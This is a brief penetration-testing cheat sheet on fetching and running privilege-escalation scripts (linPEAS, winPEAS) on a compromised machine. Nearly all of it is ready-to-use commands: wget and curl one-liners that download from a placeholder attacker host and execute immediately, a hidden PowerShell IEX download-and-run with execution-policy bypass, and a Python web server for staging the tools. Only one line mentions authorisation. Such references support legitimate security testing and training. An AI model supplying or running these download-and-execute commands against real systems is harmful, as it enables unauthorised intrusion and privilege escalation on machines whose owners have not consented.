Privilege Escalation Tools (Linpeas, WinPEAS, etc)
Tools and how to fetch them for local execution.
wget http://<attacker_host>/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
Download and run linPEAS (Linux privilege escalation script).
curl -fsSL http://<attacker_host>/linpeas.sh -o /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
Same VIA curl.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_host>/winPEAS.bat')"
Windows download & run winPEAS (usqe only if you have authorised Windows shell).
chmod +x linpeas.sh
Change the permissions linpeas.sh before usage.
./linpeas.sh
The above command will run linpeas inside your current shell.
python3 -m http.server 8080
The above command runs a http server so you can send linpeas or winPEAS from your machine (the attacker machine) to the target machine (the shell machine).